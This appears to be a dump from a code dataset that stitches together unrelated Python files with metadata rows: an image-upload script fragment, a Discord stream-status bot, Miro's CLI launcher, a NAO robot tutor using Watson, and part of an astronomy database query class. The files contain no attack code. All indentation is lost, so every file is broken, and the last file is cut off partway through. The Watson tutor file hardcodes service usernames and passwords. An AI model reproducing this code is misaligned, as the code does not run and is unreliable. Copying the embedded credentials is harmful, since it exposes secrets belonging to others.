if os.path.isdir(sys.argv[2]):
finaldir = os.path.abspath(sys.argv[2])
for f in glob.glob(os.path.join(archive_uploaded, '*.*g')):
try:
shutil.move(f, finaldir)
except shutil.Error:
pass
except:
print 'Failed to Archive {}'.format(upload_tmp_loading)
pass
def main(root_img_dir=None):
import sys,glob,shutil,os,re
import convert_img_srgb
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.[JjPpNnGg]{3}$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
if not root_img_dir:
try:
root_img_dir = sys.argv[1]
if root_img_dir == 'jblocal':
root_img_dir = os.path.abspath('/mnt/Post_Ready/Retouchers/JohnBragato/MARKETPLACE_LOCAL')
else:
root_img_dir = os.path.abspath('/mnt/Post_Complete/Complete_Archive/MARKETPLACE')
except IndexError:
root_img_dir = os.path.abspath('/mnt/Post_Complete/Complete_Archive/MARKETPLACE')
pass
else:
pass
try:
destdir = os.path.abspath(sys.argv[2])
if not os.path.isdir(destdir):
os.makedirs(destdir, 16877)
except IndexError:
destdir = '/mnt/Post_Complete/ImageDrop/' ##os.path.join(root_img_dir, 'output')
# try:
# os.makedirs(destdir, 16877)
# except OSError:
# pass
if os.path.isdir(root_img_dir):
#import md5_unique_dup_files
#duplicates = md5_unique_dup_files.find_duplicate_imgs(root_img_dir)[1]
#[ os.remove(f) for f in duplicates if f ]
imgs_renamed = [rename_retouched_file(f) for f in (glob.glob(os.path.join(root_img_dir,'*.??[gG]')))]
img_dict = sort_files_by_values(glob.glob(os.path.join(root_img_dir,'*.??[gG]')))
for k,v in img_dict.items():
try:
img = k
## Convert profile of source img if CMYK ignores if RGB
convert_img_srgb.main(image_file=img)
## Get color pixel values from source img
rgbmean = v.items()
## Generate png from source then jpgs from png
pngout = subproc_magick_png(img, rgbmean=dict(rgbmean), destdir=destdir)
subproc_magick_large_jpg(pngout, destdir=destdir)
subproc_magick_medium_jpg(pngout, destdir=destdir)
except AttributeError:
print 'SOMETHING IS WRONG WITH THE IMAGE Error {}'.format(img)
pass
else:
img = root_img_dir
if regex_coded.findall(img):
img = rename_retouched_file(img)
pngout = subproc_magick_png(img, destdir=destdir)
subproc_magick_large_jpg(pngout, destdir=destdir)
subproc_magick_medium_jpg(pngout, destdir=destdir)
try:
upload_imagedrop(destdir)
failed_dir = os.path.join(destdir,'failed_upload','*.??[gG]')
except:
print 'PrintUploadFailed'
pass
# while True:
# if glob.glob(failed_dir):
# destdir = failed_dir
# failed_dir = os.path.join(destdir,'failed_upload','*.??[gG]')
# upload_imagedrop(destdir)
#print 'NOT UPLOADING YET'
if __name__ == '__main__':
main()
| mit | -7,046,910,155,890,371,000 | 32.057543 | 207 | 0.514443 | false | 3.549173 | true | false | false |
LordHighfixxer/lrdhifxr-cogs | saltcon2/saltcon2.py | 1 | 7427 | import os
import discord
from discord.ext import commands
from .utils.dataIO import dataIO
class STREAMCON:
"""Server STREAMCON Levels"""
def __init__(self, bot):
self.bot = bot
self.settings_path = "data/STREAMCON/settings.json"
self.settings = dataIO.load_json(self.settings_path)
self.valid_STREAMCONs = ['1', '2', '3', '4', '5']
@commands.command(name="STREAMCON", no_pm=True, pass_context=True)
async def STREAMCON(self, ctx):
"""Reports the server STREAMCON level."""
server = ctx.message.server
self.load_settings(server)
nick = self.settings[server.id]["authority"]
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]), nick)
@commands.command(name="STREAMCON+", no_pm=True, pass_context=True)
async def STREAMCONplus(self, ctx):
"""Elevates the server STREAMCON level."""
server = ctx.message.server
member = ctx.message.author
self.load_settings(server)
if self.settings[server.id]["STREAMCON"] == 1:
await self.bot.say("We are already at STREAMCON 1! Oh no!")
else:
self.settings[server.id]["STREAMCON"] -= 1
self.settings[server.id]["authority"] = member.display_name
self.save_settings(server)
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]),
member.display_name)
@commands.command(name="STREAMCON-", no_pm=True, pass_context=True)
async def STREAMCONminus(self, ctx):
"""Lowers the server STREAMCON level."""
server = ctx.message.server
member = ctx.message.author
self.load_settings(server)
if self.settings[server.id]["STREAMCON"] == 5:
await self.bot.say("We are already at STREAMCON 5! Relax!")
else:
self.settings[server.id]["STREAMCON"] += 1
self.settings[server.id]["authority"] = member.display_name
self.save_settings(server)
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]),
member.display_name)
@commands.command(name="setSTREAMCON", no_pm=True, pass_context=True)
async def setSTREAMCON(self, ctx, level):
"""Manually set the server STREAMCON level in case of emergency."""
server = ctx.message.server
member = ctx.message.author
self.load_settings(server)
if level in self.valid_STREAMCONs:
self.settings[server.id]["STREAMCON"] = int(level)
self.settings[server.id]["Authority"] = member.display_name
self.save_settings(server)
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]),
member.display_name)
else:
await self.bot.say("Not a valid STREAMCON level. Haven't "
"you seen War Games Doofus?")
async def post_STREAMCON(self, level, nick):
icon_url = 'https://i.imgur.com/7psx4VV.gif'
if level == '5':
color = 0x0080ff
thumbnail_url = 'http://i.imgur.com/e2CK3om.gif'
author = "Stream status: SCHEDULED HOLD.".format(level)
subtitle = ("I am either at work or have something scheduled prior to the stream")
instructions = ("- Expect this status to change later in the day\n"
"- Start counting your Tributes\n"
"- Stream procedures will continue as planned\n"
"- Report all suspicious activity by DJ Woo")
elif level == '4':
color = 0x00ff00
thumbnail_url = 'http://i.imgur.com/TMBq2i0.gif'
author = "Stream status: GO.".format(level)
subtitle = 'Stream should launch as scheduled'
instructions = ("- Strap in and buckle up\n"
"- Begin propellant load\n"
"- Transfer guidance control to Eddie\n"
"- I usually switch to this status once I am out of work\n"
"- Stay tuned to Discord or Twitter for updates")
elif level == '3':
color = 0xffff00
thumbnail_url = 'http://i.imgur.com/uW1AZQN.gif'
author = "Stream status: HOLD.".format(level)
subtitle = 'Something has come up but it should be ok.'
instructions = ("- Stream has a good chance of happening\n"
"- This is probably just precautionary\n"
"- Expect additional updates\n"
"- Feel free to nag me for one too\n"
"- Put on your big boy pants")
elif level == '2':
color = 0xff0000
thumbnail_url = 'http://i.imgur.com/stCtTIe.gif'
author = "Stream status: Engineering HOLD.".format(level)
subtitle = 'There is a SIGNIFICANT obstacle to streaming'
instructions = ("- We are pretty sure the stream is not happening\n"
"- Queue up something to binge on Netflix\n"
"- Check StreamAlerts for who else is live\n"
"- Look for additional updates for Go or No-Go")
elif level == '1':
color = 0xffffff
thumbnail_url = 'http://i.imgur.com/U44wmN3.gif'
author = "Stream status: SCRUBBED.".format(level)
subtitle = 'The Stream is POSITIVELY not happening'
instructions = ("- Stand down from all stream launch plans\n"
"- You should absolutely find something else to do\n"
"- There will be no further updates.")
if level in self.valid_STREAMCONs:
embed = discord.Embed(title="\u2063", color=color)
embed.set_author(name=author, icon_url=icon_url)
embed.set_thumbnail(url=thumbnail_url)
embed.add_field(name=subtitle, value=instructions, inline=False)
embed.set_footer(text="Authority: {}".format(nick))
await self.bot.say(embed=embed)
else:
await self.bot.say("There was an error due to a downrange tracking system failure.")
def load_settings(self, server):
self.settings = dataIO.load_json(self.settings_path)
if server.id not in self.settings.keys():
self.add_default_settings(server)
def save_settings(self, server):
if server.id not in self.settings.keys():
self.add_default_settings(server)
dataIO.save_json(self.settings_path, self.settings)
def add_default_settings(self, server):
self.settings[server.id] = {"STREAMCON": 5, "authority": "none"}
dataIO.save_json(self.settings_path, self.settings)
def check_folders():
folder = "data/STREAMCON"
if not os.path.exists(folder):
print("Creating {} folder...".format(folder))
os.makedirs(folder)
def check_files():
default = {}
if not dataIO.is_valid_json("data/STREAMCON/settings.json"):
print("Creating default STREAMCON settings.json...")
dataIO.save_json("data/STREAMCON/settings.json", default)
def setup(bot):
check_folders()
check_files()
n = STREAMCON(bot)
bot.add_cog(n)
| gpl-3.0 | -8,147,972,054,725,798,000 | 42.208333 | 96 | 0.578699 | false | 3.96318 | false | false | false |
debugger06/MiroX | lib/frontends/cli/application.py | 3 | 3485 | # Miro - an RSS based video player application
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011
# Participatory Culture Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
#
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
import logging
import platform
from miro import app
from miro import prefs
from miro import startup
from miro import controller
from miro.infoupdater import InfoUpdater
from miro import messages
from miro.frontends.cli.util import print_text, print_box
from miro.frontends.cli.events import EventHandler
from miro.frontends.cli.interpreter import MiroInterpreter
def setup_logging():
# this gets called after miro.plat.util.setup_logging, and changes
# the logging level so it's way less spammy.
logger = logging.getLogger('')
logger.setLevel(logging.WARN)
def setup_movie_data_program_info():
from miro.plat.renderers.gstreamerrenderer import movie_data_program_info
app.movie_data_program_info = movie_data_program_info
def run_application():
setup_logging()
app.controller = controller.Controller()
print "Starting up %s" % app.config.get(prefs.LONG_APP_NAME)
print "Version: %s" % app.config.get(prefs.APP_VERSION)
print "OS: %s %s %s" % (platform.system(), platform.release(),
platform.machine())
print "Revision: %s" % app.config.get(prefs.APP_REVISION)
print "Builder: %s" % app.config.get(prefs.BUILD_MACHINE)
print "Build Time: %s" % app.config.get(prefs.BUILD_TIME)
print
app.info_updater = InfoUpdater()
app.cli_events = EventHandler()
app.cli_events.connect_to_signals()
startup.install_first_time_handler(app.cli_events.handle_first_time)
startup.startup()
app.cli_events.startup_event.wait()
if app.cli_events.startup_failure:
print_box("Error Starting Up: %s" % app.cli_events.startup_failure[0])
print
print_text(app.cli_events.startup_failure[1])
app.controller.shutdown()
return
setup_movie_data_program_info()
messages.FrontendStarted().send_to_backend()
print "Startup complete. Type \"help\" for list of commands."
app.cli_interpreter = MiroInterpreter()
app.cli_interpreter.cmdloop()
app.controller.shutdown()
| gpl-2.0 | 3,708,730,158,224,506,000 | 40 | 78 | 0.725681 | false | 3.743287 | false | false | false |
luisjuansp/NaoWatsonTutor | watson_tutor.py | 1 | 1771 | from watson_speech2text import Watson_Speech2Text
from watson_conversation import Watson_Conversation
from naoproxy import NaoProxy
class Tutor():
def __init__(self):
# broker = ALBroker("myBroker", "0.0.0.0", 0, IP, 9559)
IP = "192.168.0.100"
global nao
nao = NaoProxy(IP, "nao")
self.nao = nao
self.filename = "record.wav"
self.picturepath = "/home/nao/"
self.picturename = "picture.png"
self.nao.takePicture(self.picturepath, self.picturename)
self.conversation = Watson_Conversation('6734af95-6ca0-4d72-b80b-6c3b578c16bf',
'CqsrM7IrxeCZ', '2016-09-20',
'41c2898c-cc6a-49f6-82dc-bfc51c201a33')
self.speech2text = Watson_Speech2Text('5a43e79e-b9de-4b8b-9df2-bfaead00aaa6', '86WTJ13jYssQ', model='es-ES_BroadbandModel')
response = self.conversation.message("hello")
self.nao.say(response)
def startConversation(self):
recording = False
while True:
if self.nao.getFrontHeadStatus():
break
if recording:
recording = self.nao.getRightBumperStatus()
if not recording:
self.nao.endRecordAudio(self.filename)
self.nao.say(self.conversation.message(self.speech2text.recognize(self.filename, "audio/wav")))
else:
recording = self.nao.getRightBumperStatus()
if recording:
self.nao.startRecordAudio(self.filename)
tutor = Tutor()
tutor.startConversation()
#anteriores: '6432cebe-14b4-4f93-8e73-12ccdb5891c2','ccaNRkHB1Uqt', 21d88c8e-c0e8-48cb-bffb-61524417ae38
# | gpl-3.0 | -4,397,682,161,948,073,500 | 30.642857 | 131 | 0.597403 | false | 3.1625 | false | false | false |
albireox/marvin | python/marvin/tools/query.py | 1 | 52484 | #!/usr/bin/env python
# encoding: utf-8
# Licensed under a 3-clause BSD license.
# Revision History:
# Initial Version: 2016-02-17 14:13:28 by Brett Andrews
# 2016-02-23 - Modified to test a programmatic query using a test sample form - B. Cherinka
# 2016-03-02 - Generalized to many parameters and many forms - B. Cherinka
# - Added config drpver info
# 2016-03-12 - Changed parameter input to be a natural language string
from __future__ import division, print_function, unicode_literals
import datetime
import os
import re
import warnings
from collections import OrderedDict, defaultdict
from functools import wraps
from operator import eq, ge, gt, le, lt, ne
import numpy as np
import six
from marvin import config, marvindb
from marvin.api.api import Interaction
from marvin.core import marvin_pickle
from marvin.core.exceptions import (MarvinBreadCrumb, MarvinError, MarvinUserWarning)
from marvin.tools.results import Results, remote_mode_only
from marvin.utils.datamodel.query import datamodel
from marvin.utils.datamodel.query.base import query_params
from marvin.utils.general import temp_setattr
from marvin.utils.general.structs import string_folding_wrapper
from sqlalchemy import bindparam, func
from sqlalchemy.dialects import postgresql
from sqlalchemy.orm import aliased
from sqlalchemy.sql.expression import desc
from sqlalchemy_boolean_search import (BooleanSearchException, parse_boolean_search)
try:
import cPickle as pickle
except:
import pickle
__all__ = ['Query', 'doQuery']
opdict = {'<=': le, '>=': ge, '>': gt, '<': lt, '!=': ne, '=': eq, '==': eq}
breadcrumb = MarvinBreadCrumb()
def tree():
return defaultdict(tree)
def doQuery(*args, **kwargs):
"""Convenience function for building a Query and retrieving the Results.
Parameters:
N/A:
See the :class:`~marvin.tools.query.Query` class for a list
of inputs.
Returns:
query, results:
A tuple containing the built
:class:`~marvin.tools.query.Query` instance, and the
:class:`~marvin.tools.results.Results` instance.
"""
start = kwargs.pop('start', None)
end = kwargs.pop('end', None)
q = Query(*args, **kwargs)
try:
res = q.run(start=start, end=end)
except TypeError as e:
warnings.warn('Cannot run, query object is None: {0}.'.format(e), MarvinUserWarning)
res = None
return q, res
def updateConfig(f):
"""Decorator that updates query object with new config drpver version."""
@wraps(f)
def wrapper(self, *args, **kwargs):
if self.query and self.mode == 'local':
self.query = self.query.params({'drpver': self._drpver, 'dapver': self._dapver})
return f(self, *args, **kwargs)
return wrapper
def makeBaseQuery(f):
"""Decorator that makes the base query if it does not already exist."""
@wraps(f)
def wrapper(self, *args, **kwargs):
if not self.query and self.mode == 'local':
self._createBaseQuery()
return f(self, *args, **kwargs)
return wrapper
def checkCondition(f):
"""Decorator that checks if filter is set, if it does not already exist."""
@wraps(f)
def wrapper(self, *args, **kwargs):
if self.mode == 'local' and self.filterparams and not self._alreadyInFilter(self.filterparams.keys()):
self.add_condition()
return f(self, *args, **kwargs)
return wrapper
class Query(object):
''' A class to perform queries on the MaNGA dataset.
This class is the main way of performing a query. A query works minimally
by specifying a list of desired parameters, along with a string filter
condition in a natural language SQL format.
A local mode query assumes a local database. A remote mode query uses the
API to run a query on the Utah server, and return the results.
By default, the query returns a list of tupled parameters. The parameters
are a combination of user-defined parameters, parameters used in the
filter condition, and a set of pre-defined default parameters. The object
plate-IFU or mangaid is always returned by default.
Parameters:
returnparams (str list):
A list of string parameters names desired to be returned in the query
searchfilter (str):
A (natural language) string containing the filter conditions
in the query; written as you would say it.
returntype (str):
The requested Marvin Tool object that the results are converted into
mode ({'local', 'remote', 'auto'}):
The load mode to use. See :doc:`Mode secision tree</mode_decision>`.
sort (str):
The parameter name to sort the query on
order ({'asc', 'desc'}):
The sort order. Can be either ascending or descending.
limit (int):
The number limit on the number of returned results
Returns:
results:
An instance of the :class:`~marvin.tools.query.results.Results`
class containing the results of your Query.
Example:
>>> # filter of "NSA redshift less than 0.1 and IFU names starting with 19"
>>> searchfilter = 'nsa.z < 0.1 and ifu.name = 19*'
>>> returnparams = ['cube.ra', 'cube.dec']
>>> q = Query(searchfilter=searchfilter, returnparams=returnparams)
>>> results = q.run()
'''
def __init__(self, *args, **kwargs):
self._release = kwargs.pop('release', config.release)
self._drpver, self._dapver = config.lookUpVersions(release=self._release)
self.query = None
self.params = []
self.filterparams = {}
self.queryparams = None
self.myparamtree = tree()
self._paramtree = None
self.session = marvindb.session
self.filter = None
self.joins = []
self.myforms = defaultdict(str)
self.quiet = kwargs.get('quiet', None)
self._errors = []
self._basetable = None
self._modelgraph = marvindb.modelgraph
self._returnparams = []
self._caching = kwargs.get('caching', True)
self.verbose = kwargs.get('verbose', True)
self.count_threshold = kwargs.get('count_threshold', 1000)
self.allspaxels = kwargs.get('allspaxels', None)
self.mode = kwargs.get('mode', None)
self.limit = int(kwargs.get('limit', 100))
self.sort = kwargs.get('sort', 'mangaid')
self.order = kwargs.get('order', 'asc')
self.return_all = kwargs.get('return_all', False)
self.datamodel = datamodel[self._release]
self.marvinform = self.datamodel._marvinform
# drop breadcrumb
breadcrumb.drop(message='Initializing MarvinQuery {0}'.format(self.__class__),
category=self.__class__)
# set the mode
if self.mode is None:
self.mode = config.mode
if self.mode == 'local':
self._doLocal()
if self.mode == 'remote':
self._doRemote()
if self.mode == 'auto':
try:
self._doLocal()
except Exception as e:
warnings.warn('local mode failed. Trying remote now.', MarvinUserWarning)
self._doRemote()
# get return type
self.returntype = kwargs.get('returntype', None)
# set default parameters
self.set_defaultparams()
# get user-defined input parameters
returnparams = kwargs.get('returnparams', [])
if returnparams:
self.set_returnparams(returnparams)
# if searchfilter is set then set the parameters
searchfilter = kwargs.get('searchfilter', None)
if searchfilter:
self.set_filter(searchfilter=searchfilter)
self._isdapquery = self._checkInFilter(name='dapdb')
# Don't do anything if nothing specified
allnot = [not searchfilter, not returnparams]
if not all(allnot) and self.mode == 'local':
# create query parameter ModelClasses
self._create_query_modelclasses()
# this adds spaxel x, y into default for query 1 dap zonal query
self._adjust_defaults()
# join tables
self._join_tables()
# add condition
if searchfilter:
self.add_condition()
# add PipelineInfo
self._addPipeline()
# check if query if a dap query
if self._isdapquery:
self._buildDapQuery()
self._check_dapall_query()
def __repr__(self):
return ('Marvin Query(filter={4}, mode={0}, limit={1}, sort={2}, order={3})'
.format(repr(self.mode), self.limit, self.sort, repr(self.order), self.searchfilter))
def _doLocal(self):
''' Tests if it is possible to perform queries locally. '''
if not config.db or not self.session:
warnings.warn('No local database found. Cannot perform queries.', MarvinUserWarning)
raise MarvinError('No local database found. Query cannot be run in local mode')
else:
self.mode = 'local'
def _doRemote(self):
''' Sets up to perform queries remotely. '''
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote query calls!')
else:
self.mode = 'remote'
def _check_query(self, name):
''' Check if string is inside the query statement '''
qstate = str(self.query.statement.compile(compile_kwargs={'literal_binds':True}))
return name in qstate
def _checkInFilter(self, name='dapdb'):
''' Check if the given name is in the schema of any of the filter params '''
if self.mode == 'local':
fparams = self.marvinform._param_form_lookup.mapToColumn(self.filterparams.keys())
fparams = [fparams] if not isinstance(fparams, list) else fparams
inschema = [name in c.class_.__table__.schema for c in fparams]
elif self.mode == 'remote':
inschema = []
return True if any(inschema) else False
def _check_shortcuts_in_filter(self, strfilter):
''' Check for shortcuts in string filter
Replaces shortcuts in string searchfilter
with the full tables and names.
is there a better way?
'''
# table shortcuts
# for key in self.marvinform._param_form_lookup._tableShortcuts.keys():
# #if key in strfilter:
# if re.search('{0}.[a-z]'.format(key), strfilter):
# strfilter = strfilter.replace(key, self.marvinform._param_form_lookup._tableShortcuts[key])
# name shortcuts
for key in self.marvinform._param_form_lookup._nameShortcuts.keys():
if key in strfilter:
# strfilter = strfilter.replace(key, self.marvinform._param_form_lookup._nameShortcuts[key])
param_form_lookup = self.marvinform._param_form_lookup
strfilter = re.sub(r'\b{0}\b'.format(key),
'{0}'.format(param_form_lookup._nameShortcuts[key]),
strfilter)
return strfilter
def _adjust_defaults(self):
''' Adjust the default parameters to include necessary parameters
For any query involving DAP DB, always return the spaxel index
TODO: change this to spaxel x and y
TODO: change this entirely
'''
dapschema = ['dapdb' in c.class_.__table__.schema for c in self.queryparams]
if any(dapschema):
dapcols = ['spaxelprop.x', 'spaxelprop.y', 'bintype.name', 'template.name']
self.defaultparams.extend(dapcols)
self.params.extend(dapcols)
self.params = list(OrderedDict.fromkeys(self.params))
self._create_query_modelclasses()
# qpdap = self.marvinform._param_form_lookup.mapToColumn(dapcols)
# self.queryparams.extend(qpdap)
# self.queryparams_order.extend([q.key for q in qpdap])
def set_returnparams(self, returnparams):
''' Loads the user input parameters into the query params limit
Adds a list of string parameter names into the main list of
query parameters to return
Parameters:
returnparams (list):
A string list of the parameters you wish to return in the query
'''
if returnparams:
returnparams = [returnparams] if not isinstance(returnparams, list) else returnparams
# look up shortcut names for the return parameters
full_returnparams = [self.marvinform._param_form_lookup._nameShortcuts[rp]
if rp in self.marvinform._param_form_lookup._nameShortcuts else rp
for rp in returnparams]
self._returnparams = full_returnparams
# remove any return parameters that are also defaults
use_only = [f for f in full_returnparams if f not in self.defaultparams]
self.params.extend(use_only)
def set_defaultparams(self):
''' Loads the default params for a given return type
TODO - change mangaid to plateifu once plateifu works in
cube, maps, rss, modelcube - file objects
spaxel, map, rssfiber - derived objects (no file)
these are also the default params except
any query on spaxelprop should return spaxel_index (x/y)
Minimum parameters to instantiate a Marvin Tool
cube - return plateifu/mangaid
modelcube - return plateifu/mangaid, bintype, template
rss - return plateifu/mangaid
maps - return plateifu/mangaid, bintype, template
spaxel - return plateifu/mangaid, spaxel x and y
map - do not instantiate directly (plateifu/mangaid, bintype, template, property name, channel)
rssfiber - do not instantiate directly (plateifu/mangaid, fiberid)
return any of our tools
'''
assert self.returntype in [None, 'cube', 'spaxel', 'maps',
'rss', 'modelcube'], 'Query returntype must be either cube, spaxel, maps, modelcube, rss'
self.defaultparams = ['cube.mangaid', 'cube.plate', 'cube.plateifu', 'ifu.name']
if self.returntype == 'spaxel':
pass
#self.defaultparams.extend(['spaxel.x', 'spaxel.y'])
elif self.returntype == 'modelcube':
self.defaultparams.extend(['bintype.name', 'template.name'])
elif self.returntype == 'rss':
pass
elif self.returntype == 'maps':
self.defaultparams.extend(['bintype.name', 'template.name'])
# self.defaultparams.extend(['spaxelprop.x', 'spaxelprop.y'])
# add to main set of params
self.params.extend(self.defaultparams)
def _create_query_modelclasses(self):
''' Creates a list of database ModelClasses from a list of parameter names '''
self.params = [item for item in self.params if item in set(self.params)]
self.queryparams = self.marvinform._param_form_lookup.mapToColumn(self.params)
self.queryparams = [item for item in self.queryparams if item in set(self.queryparams)]
self.queryparams_order = [q.key for q in self.queryparams]
def get_available_params(self, paramdisplay='best'):
''' Retrieve the available parameters to query on
Retrieves a list of the available query parameters.
Can either retrieve a list of all the parameters or only the vetted parameters.
Parameters:
paramdisplay (str {all|best}):
String indicating to grab either all or just the vetted parameters.
Default is to only return 'best', i.e. vetted parameters
Returns:
qparams (list):
a list of all of the available queryable parameters
'''
assert paramdisplay in ['all', 'best'], 'paramdisplay can only be either "all" or "best"!'
if paramdisplay == 'all':
qparams = self.datamodel.groups.list_params('full')
elif paramdisplay == 'best':
qparams = query_params
return qparams
@remote_mode_only
def save(self, path=None, overwrite=False):
''' Save the query as a pickle object
Parameters:
path (str):
Filepath and name of the pickled object
overwrite (bool):
Set this to overwrite an existing pickled file
Returns:
path (str):
The filepath and name of the pickled object
'''
sf = self.searchfilter.replace(' ', '') if self.searchfilter else 'anon'
# set the path
if not path:
path = os.path.expanduser('~/marvin_query_{0}.mpf'.format(sf))
# check for file extension
if not os.path.splitext(path)[1]:
path = os.path.join(path + '.mpf')
path = os.path.realpath(path)
if os.path.isdir(path):
raise MarvinError('path must be a full route, including the filename.')
if os.path.exists(path) and not overwrite:
warnings.warn('file already exists. Not overwriting.', MarvinUserWarning)
return
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
# set bad pickled attributes to None
attrs = ['session', 'datamodel', 'marvinform', 'myform', '_modelgraph']
# pickle the query
try:
with temp_setattr(self, attrs, None):
pickle.dump(self, open(path, 'wb'), protocol=-1)
except Exception as ee:
if os.path.exists(path):
os.remove(path)
raise MarvinError('Error found while pickling: {0}'.format(str(ee)))
return path
@classmethod
def restore(cls, path, delete=False):
''' Restore a pickled object
Parameters:
path (str):
The filename and path to the pickled object
delete (bool):
Turn this on to delete the pickled fil upon restore
Returns:
Query (instance):
The instantiated Marvin Query class
'''
obj = marvin_pickle.restore(path, delete=delete)
obj._modelgraph = marvindb.modelgraph
obj.session = marvindb.session
obj.datamodel = datamodel[obj._release]
# if obj.allspaxels:
# obj.datamodel.use_all_spaxels()
obj.marvinform = obj.datamodel._marvinform
return obj
def set_filter(self, searchfilter=None):
''' Parses a filter string and adds it into the query.
Parses a natural language string filter into the appropriate SQL
filter syntax. String is a boolean join of one or more conditons
of the form "PARAMETER_NAME OPERAND VALUE"
Parameter names must be uniquely specified. For example, nsa.z is
a unique parameter name in the database and can be specified thusly.
On the other hand, name is not a unique parameter name in the database,
and must be clarified with the desired table.
Parameter Naming Convention:
NSA redshift == nsa.z
IFU name == ifu.name
Pipeline name == pipeline_info.name
Allowed Joins:
AND | OR | NOT
In the absence of parantheses, the precedence of
joins follow: NOT > AND > OR
Allowed Operands:
== | != | <= | >= | < | > | =
Notes:
Operand == maps to a strict equality (x == 5 --> x is equal to 5)
Operand = maps to SQL LIKE
(x = 5 --> x contains the string 5; x = '%5%')
(x = 5* --> x starts with the string 5; x = '5%')
(x = *5 --> x ends with the string 5; x = '%5')
Parameters:
searchfilter (str):
A (natural language) string containing the filter conditions
in the query; written as you would say it.
Example:
>>> # Filter string
>>> filter = "nsa.z < 0.012 and ifu.name = 19*"
>>> # Converts to
>>> and_(nsa.z<0.012, ifu.name=19*)
>>> # SQL syntax
>>> mangasampledb.nsa.z < 0.012 AND lower(mangadatadb.ifudesign.name) LIKE lower('19%')
>>> # Filter string
>>> filter = 'cube.plate < 8000 and ifu.name = 19 or not (nsa.z > 0.1 or not cube.ra > 225.)'
>>> # Converts to
>>> or_(and_(cube.plate<8000, ifu.name=19), not_(or_(nsa.z>0.1, not_(cube.ra>225.))))
>>> # SQL syntax
>>> mangadatadb.cube.plate < 8000 AND lower(mangadatadb.ifudesign.name) LIKE lower(('%' || '19' || '%'))
>>> OR NOT (mangasampledb.nsa.z > 0.1 OR mangadatadb.cube.ra <= 225.0)
'''
if searchfilter:
# if params is a string, then parse and filter
if isinstance(searchfilter, six.string_types):
searchfilter = self._check_shortcuts_in_filter(searchfilter)
try:
parsed = parse_boolean_search(searchfilter)
except BooleanSearchException as e:
raise MarvinError('Your boolean expression contained a syntax error: {0}'.format(e))
else:
raise MarvinError('Input parameters must be a natural language string!')
# update the parameters dictionary
self.searchfilter = searchfilter
self._parsed = parsed
self._checkParsed()
self.strfilter = str(parsed)
self.filterparams.update(parsed.params)
filterkeys = [key for key in parsed.uniqueparams if key not in self.params]
self.params.extend(filterkeys)
# print filter
if not self.quiet:
print('Your parsed filter is: ')
print(parsed)
# Perform local vs remote modes
if self.mode == 'local':
# Pass into Marvin Forms
try:
self._setForms()
except KeyError as e:
self.reset()
raise MarvinError('Could not set parameters. Multiple entries found for key. Be more specific: {0}'.format(e))
elif self.mode == 'remote':
# Is it possible to build a query remotely but still allow for user manipulation?
pass
def _setForms(self):
''' Set the appropriate WTForms in myforms and set the parameters '''
self._paramtree = self.marvinform._paramtree
for key in self.filterparams.keys():
self.myforms[key] = self.marvinform.callInstance(self.marvinform._param_form_lookup[key], params=self.filterparams)
self.myparamtree[self.myforms[key].Meta.model.__name__][key]
def _validateForms(self):
''' Validate all the data in the forms '''
formkeys = list(self.myforms.keys())
isgood = [form.validate() for form in self.myforms.values()]
if not all(isgood):
inds = np.where(np.invert(isgood))[0]
for index in inds:
self._errors.append(list(self.myforms.values())[index].errors)
raise MarvinError('Parameters failed to validate: {0}'.format(self._errors))
def add_condition(self):
''' Loop over all input forms and add a filter condition based on the input parameter form data. '''
# validate the forms
self._validateForms()
# build the actual filter
self.build_filter()
# add the filter to the query
if not isinstance(self.filter, type(None)):
self.query = self.query.filter(self.filter)
@makeBaseQuery
def _join_tables(self):
''' Build the join statement from the input parameters '''
self._modellist = [param.class_ for param in self.queryparams]
# Gets the list of joins from ModelGraph. Uses Cube as nexus, so that
# the order of the joins is the correct one.
# TODO: at some point, all the queries should be generalised so that
# we don't assume that we are querying a cube.
joinmodellist = self._modelgraph.getJoins(self._modellist, format_out='models', nexus=marvindb.datadb.Cube)
# sublist = [model for model in modellist if model.__tablename__ not in self._basetable and not self._tableInQuery(model.__tablename__)]
# self.joins.extend([model.__tablename__ for model in sublist])
# self.query = self.query.join(*sublist)
for model in joinmodellist:
name = '{0}.{1}'.format(model.__table__.schema, model.__tablename__)
if not self._tableInQuery(name):
self.joins.append(model.__tablename__)
if 'template' not in model.__tablename__:
self.query = self.query.join(model)
else:
# assume template_kin only now, TODO deal with template_pop later
self.query = self.query.join(model, marvindb.dapdb.Structure.template_kin)
def build_filter(self):
''' Builds a filter condition to load into sqlalchemy filter. '''
try:
self.filter = self._parsed.filter(self._modellist)
except BooleanSearchException as e:
raise MarvinError('Your boolean expression could not me mapped to model: {0}'.format(e))
def update_params(self, param):
''' Update the input parameters '''
# param = {key: unicode(val) if '*' not in unicode(val) else unicode(val.replace('*', '%')) for key, val in param.items() if key in self.filterparams.keys()}
param = {key: val.decode('UTF-8') if '*' not in val.decode('UTF-8') else val.replace('*', '%').decode('UTF-8') for key, val in param.items() if key in self.filterparams.keys()}
self.filterparams.update(param)
self._setForms()
def _update_params(self, param):
